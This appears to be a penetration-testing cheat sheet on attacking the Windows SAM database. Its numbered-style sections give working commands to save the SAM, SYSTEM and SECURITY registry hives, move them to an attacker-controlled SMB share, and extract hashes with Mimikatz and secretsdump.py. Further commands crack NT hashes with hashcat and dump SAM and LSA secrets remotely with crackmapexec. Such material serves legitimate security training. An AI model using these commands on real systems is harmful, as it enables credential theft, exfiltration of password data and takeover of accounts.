Attacking SAM

Copying SAM Registry Hives

There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below:

Registry Hive
Description

hklm\sam

Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.

hklm\system

Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.

hklm\security

Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

Dumping SAM with Mimikatz

lsadump::sam

Using reg.exe save to Copy Registry Hives

reg.exe save hklm\\sam C:\\sam.save

reg.exe save hklm\\system C:\\system.save

reg.exe save hklm\\security C:\\security.save

# Send the saved files to our system 
# start smbserver 
smbserver.py -smb2support share . 

# In Target Windows host
move sam.save \\\\ip\\share
move system.save \\\\ip\\share
move security.save \\\\ip\\share

Dumping Hashes with Impacket's secretsdump.py

# Dumping Hashes using transfered files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL 

Cracking Hashes with Hashcat

# Store nthashes to a .txt File
(uid:rid:lmhash:nthash) <-- last part is nthash

# Cracking nt hashes using hashcat
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Remote Dumping & LSA Secrets Considerations

Dumping LSA Secrets Remotely

crackmapexec smb ip --local-auth -u eren -p pass --lsa

Dumping SAM Remotely

crackmapexec smb ip --local-auth -u eren -p pass --sam

Last updated